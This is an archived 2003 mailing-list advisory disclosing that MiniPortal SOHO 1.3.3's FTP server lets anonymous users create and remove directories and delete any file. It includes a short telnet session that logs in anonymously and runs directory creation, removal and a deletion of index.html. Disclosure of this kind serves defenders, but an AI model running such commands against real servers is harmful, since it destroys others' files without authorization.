('binary' encoding is not supported, stored as-is) Product : MiniPortal SOHO Version : 1.3.3 OSystem : Windows Authors : Instant Servers Inc WebSite : http://www.instantservers.com Problem : Create and Remove directories with anonymous access Description: ------------ eng: ==== MiniPortal includes the following components: WEB Server [Apache 1.3.27] FTP Server DNS Server During research of components of the server, the following was revealed: The anonymous user can create and delete directories on the server, And also can delete any files on it. Exploits: --------- >>Telnet 127.0.0.1 21 220 FTP Server, ready >> USER anonymous 331 Password required >> PASS anonymous@localhost 230 User logged in >>MKD test 257 "test" created >>RMD test 200 Okay >>DELE index.html 200 Okay Contacts: --------- r2subj3ctat_private subj.24h.to (www.dwcgr0up.com/subj/) www.dwcgr0up.com irc.dwcgr0up.biz #dwc Thanks: ------- DHG, GipsHack, Netp0is0n, de1irium, r00tc0de, f0kp, exploit.ru, nobodies DethSpirit, r4ShRaY, D4rkGr3y, Moby, Orb, Foster, Owned, prior, Demon.
This archive was generated by hypermail 2b30 : Tue Apr 01 2003 - 18:51:12 PST